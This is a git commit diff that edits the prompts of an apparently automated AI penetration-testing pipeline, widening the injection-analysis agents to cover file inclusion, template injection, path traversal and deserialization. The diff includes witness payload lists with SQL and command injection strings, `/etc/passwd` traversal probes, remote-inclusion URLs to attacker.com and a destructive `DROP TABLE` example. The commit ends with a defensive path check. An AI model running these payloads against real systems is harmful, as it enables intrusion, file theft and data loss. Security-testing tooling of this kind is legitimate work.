feat: expand injection analysis scope to cover LFI/RFI/SSTI/Path Traversal/Deserialization

Fixes responsibility gap where agents found vulnerabilities but rejected them as "out of scope".

Changes:
- vuln-injection.txt: Added LFI/RFI, SSTI, Path Traversal, Deserialization to scope
  - Updated role definition and objective
  - Added new vulnerability_type and slot_type enums
  - Added sink definitions and defense rules for new injection classes
  - Added witness payload examples
- pre-recon-code.txt: Expanded sink hunter agent to find file/template/deserialize sinks
- recon.txt: Updated Section 9 with clear injection source definitions for all types
- exploit-injection.txt: Updated evidence template to handle all injection types

Token-optimized: Condensed verbose sections while preserving critical guidance

Addresses XBEN benchmark failures where LFI/SSTI/Path Traversal were detected but excluded from exploitation queues

🤖 Generated with [Claude Code](https://claude.com/claude-code)

Co-Authored-By: Claude <noreply@anthropic.com>
2026-02-12 17:22:50 +00:00 · 2025-10-31 10:40:34 -07:00
parent 52d7cc46a6
commit 4224d1c4f4
4 changed files with 38 additions and 77 deletions
--- a/prompts/pipeline-testing/exploit-injection.txt
+++ b/prompts/pipeline-testing/exploit-injection.txt
@@ -23,7 +23,7 @@ Use the save_deliverable MCP tool to create your evidence:

 Use `save_deliverable` MCP tool with:
 - `deliverable_type: "INJECTION_EVIDENCE"`
- `content: "# Injection Exploitation Evidence (Pipeline Test)\n\n**MCP Server Used:** {{MCP_SERVER}}\n**Test Site:** https://example.com\n**Screenshot:** injection-exploit-test.png\n**Status:** Browser isolation test successful\n\n## Exploitation Results\n- **Target:** Test injection vulnerability\n- **Method:** SQL injection via query parameter\n- **Evidence:** Successfully executed test payload `'; DROP TABLE users; --`\n- **Impact:** Demonstrated ability to manipulate database queries\n- **Proof:** Pipeline testing mode - simulated successful exploitation\n\n## Technical Details\n- **Vulnerability ID:** INJ-VULN-01\n- **Exploitation Status:** Simulated Success (Pipeline Test)\n- **MCP Instance:** {{MCP_SERVER}}"`
+- `content: "# Injection Exploitation Evidence (Pipeline Test)\n\n**MCP Server Used:** {{MCP_SERVER}}\n**Test Site:** https://example.com\n**Screenshot:** injection-exploit-test.png\n**Status:** Browser isolation test successful\n\n## Exploitation Results\n- **Target:** Test injection vulnerability\n- **Vulnerability Type:** SQLi | CommandInjection | LFI | RFI | SSTI | PathTraversal | InsecureDeserialization\n- **Method:** [Type-specific exploitation method]\n- **Evidence:** Successfully executed test payload\n- **Impact:** Demonstrated ability to manipulate [database queries | system commands | file system | template engine | deserialization]\n- **Proof:** Pipeline testing mode - simulated successful exploitation\n\n## Technical Details\n- **Vulnerability ID:** INJ-VULN-XX\n- **Exploitation Status:** Simulated Success (Pipeline Test)\n- **MCP Instance:** {{MCP_SERVER}}"`

 This will automatically create `deliverables/injection_exploitation_evidence.md`.

--- a/prompts/pre-recon-code.txt
+++ b/prompts/pre-recon-code.txt
@@ -110,7 +110,7 @@ Launch these three discovery agents simultaneously to understand the codebase st
 After Phase 1 completes, launch all three vulnerability-focused agents in parallel:

 4. **XSS/Injection Sink Hunter Agent**:
-   "Find all dangerous sinks where untrusted input could execute in browser contexts or system commands. Include XSS sinks (innerHTML, document.write, template injection), SQL injection points, command injection, and template injection. Provide render contexts and exact file locations. If no sinks are found, report that explicitly."
+   "Find all dangerous sinks where untrusted input could execute in browser contexts, system commands, file operations, template engines, or deserialization. Include XSS sinks (innerHTML, document.write), SQL injection points, command injection (exec, system), file inclusion/path traversal (fopen, include, require, readFile), template injection (render, compile, evaluate), and deserialization sinks (pickle, unserialize, readObject). Provide exact file locations with line numbers. If no sinks are found, report that explicitly."

 5. **SSRF/External Request Tracer Agent**:
   "Identify all locations where user input could influence server-side requests. Find HTTP clients, URL fetchers, webhook handlers, external API integrations, and file inclusion mechanisms. Map user-controllable request parameters with exact code locations. If no SSRF sinks are found, report that explicitly."
--- a/prompts/recon.txt
+++ b/prompts/recon.txt
@@ -342,50 +342,24 @@ Multi-step workflow endpoints that assume prior steps were completed.
 | Password Reset | `/api/auth/reset/confirm` | Reset token generated | Direct password reset |
 | Multi-step Forms | `/api/wizard/finalize` | Form data from previous steps | Skip validation steps |

-## 9. Injection Sources (Command Injection and SQL Injection)
+## 9. Injection Sources (Command Injection, SQL Injection, LFI/RFI, SSTI, Path Traversal, Deserialization)
 **TASK AGENT COORDINATION:** Launch a dedicated **Injection Source Tracer Agent** to identify these sources:
-"Find all command injection and SQL injection sources in the codebase. Trace user-controllable input from network-accessible endpoints to shell commands and database queries. For each source found, provide the complete data flow path from input to dangerous sink with exact file paths and line numbers."
+"Find all injection sources in the codebase: SQL injection, command injection, file inclusion/path traversal (LFI/RFI), server-side template injection (SSTI), and insecure deserialization. Trace user-controllable input from network-accessible endpoints to dangerous sinks (database queries, shell commands, file operations, template engines, deserialization functions). For each source found, provide the complete data flow path from input to dangerous sink with exact file paths and line numbers."

 **Network Surface Focus:** Only report injection sources that can be reached through the target web application's network interface. Exclude sources from local-only scripts, build tools, CLI applications, development utilities, or components that cannot be accessed via network requests to the deployed application.

-Create a list of network-accessible Command Injection and SQL injection sources using findings from the Injection Source Tracer Agent. Your output MUST include sufficient information to find the exact location found, such as filepaths with line numbers, or specific references for a downstream agent to find the location exactly.
-Command Injection Source: Any data that flows from a user-controlled origin into a program variable that is eventually interpolated into a shell or system command string (within network-accessible code paths).
-SQL Injection Source: Any user-controllable input that reaches a database query string (within network-accessible code paths). 
-Vulnerability Sources by Type
-		- 1. Command Injection Sources
-				- HTTP Request Data
-				- Query Parameters
-				- Form Fields
-				- Cookies
-				- HTTP Headers (e.g., User-Agent, X-Forwarded-For, Referer)
-				- File Uploads
-				- Filenames
-				- File Contents
-				- Environment Variables
-				- Inter-Process Communication (IPC)
-				- Data from Sockets
-				- Data from Pipes
-				- Data from Message Queues
-				- Configuration Files or Registry Entries
-				- Command-Line Arguments
-		- 2. SQL Injection Sources
-				- HTTP Request Data
-				- Query Parameters
-				- Form Fields (e.g., login, search)
-				- Cookies
-				- HTTP Headers
-				- File Uploads
-				- File Metadata (e.g., filename, filetype, description)
-				- Hidden Fields in HTML Forms
-				- URL Path Variables (e.g., in REST APIs)
-				- Stored Inputs
-				- Comments
-				- Blog Posts
-				- User Profile Fields
-				- Third-Party Integrations
-				- Webhook Data
-				- API Responses
-	CRITICAL: You must only include a source in this list if it matches the Command Injection and SQLI source definitions above (meets the requirement of tracing back to a DB query or a backend command execute).
+List network-accessible injection sources with exact file:line locations.
+
+**Injection Source Definitions:**
+- **Command Injection Source:** Data that flows from a user-controlled origin into a program variable that is eventually interpolated into a shell or system command string (within network-accessible code paths).
+- **SQL Injection Source:** User-controllable input that reaches a database query string (within network-accessible code paths).
+- **LFI/RFI/Path Traversal Source:** User-controllable input that influences file paths in file operations (read, include, require).
+- **SSTI Source:** User-controllable input embedded in template expressions or template content.
+- **Deserialization Source:** User-controllable input passed to deserialization functions.
+
+**Common Vectors:** HTTP params/body/headers/cookies, file uploads/names, URL paths, stored data, webhooks, sessions, message queues
+
+CRITICAL: Only include sources tracing to dangerous sinks (shell, DB, file ops, templates, deserialization).

 ---
 </deliverable_instructions>
--- a/prompts/vuln-injection.txt
+++ b/prompts/vuln-injection.txt
@@ -1,13 +1,11 @@
 <role>
-You are an Injection Analysis Specialist, an expert in **white-box code analysis and data flow tracing** for both SQL Injection (SQLi) and Command Injection vulnerabilities.
-Your primary function is to analyze how untrusted user input (sources) travels through the application to security-sensitive sinks, including the **database layer (SQLi sinks)** and the **operating system shell (command injection sinks)**.
+You are an Injection Analysis Specialist, an expert in **white-box code analysis and data flow tracing** for SQLi, Command Injection, LFI/RFI, SSTI, Path Traversal, and Deserialization vulnerabilities.
+Your primary function is to analyze how untrusted user input travels to security-sensitive sinks: database queries, shell commands, file operations, template engines, and deserialization functions.
 </role>

 <objective>
-Your mission is to identify and document every instance where untrusted user input insecurely influences the structure of a backend command. This includes:
-1. **SQL Context Mismatch:** Data is not sanitized correctly for the specific part of an SQL query it influences (e.g., a data value vs. a table name).
-2. **Command Injection Flaw:** Data is not escaped or validated correctly before being incorporated into a shell command executed by the operating system.
-Success criterion: A complete source-to-sink trace for every identified vulnerability (SQLi or Command Injection), detailing the path, the sanitizers encountered, the sink context, and the reason for the vulnerability, confirmed with a minimal, repeatable proof-of-concept.
+Your mission is to identify where untrusted input reaches dangerous sinks without proper defenses: SQL queries, shell commands, file operations, template engines, or deserialization functions.
+Success criterion: Complete source-to-sink traces detailing path, sanitizers, sink context, and vulnerability reason with a minimal proof-of-concept payload.
 </objective>

 <scope>
@@ -101,18 +99,18 @@ An **exploitable vulnerability** is a confirmed source-to-sink path where the en
  **Structure:** The `vulnerability` JSON object MUST follow this exact format:
 		{
 			"ID": "unique ID for each vulnerability (e.g., INJ-VULN-XX)",
-			"vulnerability_type": "SQLi | CommandInjection",
+			"vulnerability_type": "SQLi | CommandInjection | LFI | RFI | SSTI | PathTraversal | InsecureDeserialization",
 			"externally_exploitable": true | false,
 			"source": "param name & file:line.",
 			"combined_sources": "list if multiple sources were merged (with order).",
 			"path": "brief hop list (controller → fn → sink).",
 			"sink_call": "file:line and function/method.",
-			"slot_type": "SQL-val | SQL-like | SQL-num | SQL-enum | SQL-ident | CMD-argument | CMD-part-of-string.",
+			"slot_type": "SQL-val | SQL-like | SQL-num | SQL-enum | SQL-ident | CMD-argument | CMD-part-of-string | FILE-path | FILE-include | TEMPLATE-expression | DESERIALIZE-object | PATH-component",
 			"sanitization_observed": "name & file:line (all of them, in order).",
 			"concat_occurrences": "each concat/format/join with file:line; flag those after sanitization.",
 			"verdict": "safe | vulnerable.",
 			"mismatch_reason": "if vulnerable, 1–2 lines in plain language.",
-			"witness_payload": "minimal input you'd use later to show structure influence (e.g., ' for SQLi, ; ls -la for Command Injection).",
+			"witness_payload": "minimal input you'd use later to show structure influence (e.g., ' for SQLi, ; ls -la for Command Injection, ../../../../etc/passwd for LFI, {{7*7}} for SSTI).",
 			"confidence": "high | med | low.",
 			"notes": "assumptions, untraversed branches, anything unusual."
 		}
@@ -136,27 +134,15 @@ An **exploitable vulnerability** is a confirmed source-to-sink path where the en
 		      - **A. The full sequence of transformations:** Document all assignments, function calls, and string operations from the controller to the data access layer.
 		      - **B. The ordered list of sanitizers on that path:** Record every sanitization function encountered *on this specific path*, including its name, file:line, and type (e.g., parameter binding, type casting).
 		      - **C. All concatenations on that path:** Note every string concatenation or format operation involving the tainted data. Crucially, flag any concatenation that occurs *after* a sanitization step on this path.
-  - **3) Detect sinks (Security-Sensitive Execution Points) and label input slots**
-		- **SQLi Sinks:** DB driver calls, ORM "raw SQL", string-built SQL, stored procedures.
-		- **Command Injection Sinks:** Calls to `os.system`, `subprocess.run`, `exec`, `eval`, or any library function that passes arguments to a system shell.
-		- For each sink, identify the part(s) the traced input influences and label the slot type:
-				- **SQL - data value:** (e.g., RHS of `=`, items in `IN (…)`)
-				- **SQL - like-pattern:** (RHS of `LIKE`)
-				- **SQL - numeric:** (`LIMIT`, `OFFSET`, counters)
-				- **SQL - keyword:** (e.g., `ASC`/`DESC`)
-				- **SQL - identifier:** (column/table name)
-		- **CMD - argument:** An entire, properly quoted argument to a command.
-		- **CMD - part-of-string:** Part of a command string that will be parsed by the shell, often after concatenation.
- **4) Decide if sanitization matches the sink's context (core rule)**
-		- **For SQL Sinks:**
-		- **data value slot:** parameter binding (or strict parse → typed bind). Mismatch: any concat; HTML/URL escaping; regex "sanitization".
-		- **like-pattern slot:** bind **and** escape `%/_`; use `ESCAPE`. Mismatch: raw `%/_`; only trimming; binding without wildcard controls.
-		- **numeric slot:** parse/cast to integer **before** binding. Mismatch: numeric strings; concatenation; casting after concat.
-		- **SQL syntax — keyword (enum):** whitelist from a tiny set (e.g., `ASC|DESC`). Mismatch: free text; regex filters; only lowercasing.
-		- **SQL syntax — identifier:** whitelist/map to fixed column/table names. Mismatch: trying to "escape" identifiers; assuming binds help here.
-		- **For Command Injection Sinks:**
-		- **argument slot:** Use of command argument arrays (e.g., `subprocess.run(['ls', '-l', userInput])`) where the shell is not invoked (`shell=False`). Mismatch: passing a single concatenated string to a command execution function that uses a shell.
-		- **part-of-string slot:** Strict, whitelist-based validation or shell-specific escaping (e.g., `shlex.quote()`). Mismatch: lack of escaping, blacklisting special characters (e.g., `|;&$`), or any form of direct string concatenation into a command passed to a shell.
+  - **3) Detect sinks and label slot types**
+		- **SQLi:** DB calls, raw SQL, string-built queries | **Command:** `exec`, `system`, `subprocess`, shell invocations | **File:** `include`, `require`, `fopen`, `readFile` | **SSTI:** template `render`/`compile` with user content | **Deserialize:** `pickle.loads`, `unserialize`, `readObject`, `yaml.load`
+		- **Slot labels:** SQL-val/like/num/enum/ident | CMD-argument/part-of-string | FILE-path/include | TEMPLATE-expression | DESERIALIZE-object | PATH-component
+- **4) Match sanitization to sink context**
+		- **SQL:** Binds for val/like/num; whitelist for enum/ident. Mismatch: concat, regex, wrong slot defense
+		- **Command:** Array args (`shell=False`) OR `shlex.quote()`. Mismatch: concat, blacklist, `shell=True`
+		- **File/Path:** Whitelist paths OR `resolve()` + boundary check. Mismatch: concat, `../` blacklist, no protocol check
+		- **SSTI:** Sandboxed context + autoescape; no user input in expressions. Mismatch: concat, weak sandbox
+		- **Deserialize:** Trusted sources only; safe formats + HMAC. Mismatch: untrusted input, pickle/unserialize
  - **5) Make the call (vulnerability or safe)**
    - **Vulnerable** if any tainted input reaches a slot with no defense or the wrong one.
    - Include a short rationale (e.g., "context mismatch: regex escape on ORDER BY keyword slot").
@@ -209,11 +195,12 @@ An **exploitable vulnerability** is a confirmed source-to-sink path where the en
 <witness_inputs_for_later>
 **Hold for the exploit phase (do not execute during analysis)**

-* Error shape checkers: `'` `"` `)` `;` `\`
-* Boolean toggles: `... AND 1=1` vs `... AND 1=2`
-* Timing toggles: `... AND SLEEP(5)` or database-specific delay
-* UNION probes: `... UNION SELECT NULL ...`
-* Comment terminators: `--` `#` `/**/`
+* **SQLi:** Error shape checkers: `'` `"` `)` `;` `\` | Boolean toggles: `... AND 1=1` vs `... AND 1=2` | Timing toggles: `... AND SLEEP(5)` | UNION probes: `... UNION SELECT NULL ...` | Comment terminators: `--` `#` `/**/`
+* **Command Injection:** `; ls -la` | `| whoami` | `\`id\`` | `$(cat /etc/passwd)` | `& dir` | `|| uname -a`
+* **LFI/Path Traversal:** `../../../../etc/passwd` | `....//....//etc/passwd` | `..%252f..%252fetc/passwd` | `/etc/passwd%00` | `....\/....\/windows/win.ini`
+* **RFI:** `http://attacker.com/shell.txt` | `//attacker.com/evil.php` | `ftp://attacker.com/backdoor.php`
+* **SSTI:** `{{7*7}}` | `${7*7}` | `<%= 7*7 %>` | `{{config.items()}}` | `{{''.__class__.__mro__[1].__subclasses__()}}` | `#{7*7}`
+* **Deserialization:** Serialized object payloads specific to language (e.g., Python pickle with `__reduce__`, Java gadget chains, PHP `O:` notation with magic methods)
 * Keep these as examples under `witness_payload` in findings; they are not required to classify a path as vulnerable during analysis.
 </witness_inputs_for_later>
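
Reviewer note: the new File/Path rule in step 4 ("Whitelist paths OR `resolve()` + boundary check") is terse, so here is a minimal sketch of what that defense could look like in application code under analysis. It is not part of this commit. The function name `resolve_within` and the base directory `/srv/app/uploads` are hypothetical, chosen only for illustration.

```python
from pathlib import Path


def resolve_within(base: Path, user_path: str) -> Path:
    """Resolve user_path under base and reject anything that escapes base.

    Hypothetical helper: illustrates the "resolve() + boundary check" defense.
    """
    base_resolved = base.resolve()
    # Joining with an absolute user_path discards base entirely, and ".."
    # segments are collapsed by resolve(); both cases are caught below.
    candidate = (base_resolved / user_path).resolve()
    try:
        # relative_to raises ValueError when candidate is not under base.
        candidate.relative_to(base_resolved)
    except ValueError:
        raise ValueError(f"path escapes base directory: {user_path!r}") from None
    return candidate


if __name__ == "__main__":
    uploads = Path("/srv/app/uploads")  # hypothetical base directory
    print(resolve_within(uploads, "report.txt"))
    for payload in ("../../../../etc/passwd", "/etc/passwd"):
        try:
            resolve_within(uploads, payload)
        except ValueError as exc:
            print("rejected:", exc)
```

The check runs on the resolved path rather than on the raw string, which is why a `../` blacklist is listed as a mismatch: encodings and nested sequences can slip past string filters, while the boundary check only looks at where the path finally points.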